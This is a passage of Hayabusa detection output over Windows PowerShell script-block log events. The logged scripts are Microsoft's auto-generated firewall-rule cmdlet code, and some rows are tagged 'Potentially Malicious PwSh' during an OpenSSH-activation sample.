[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } 
if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuild",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuild",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"er.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) 
$__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdl",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"er.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 
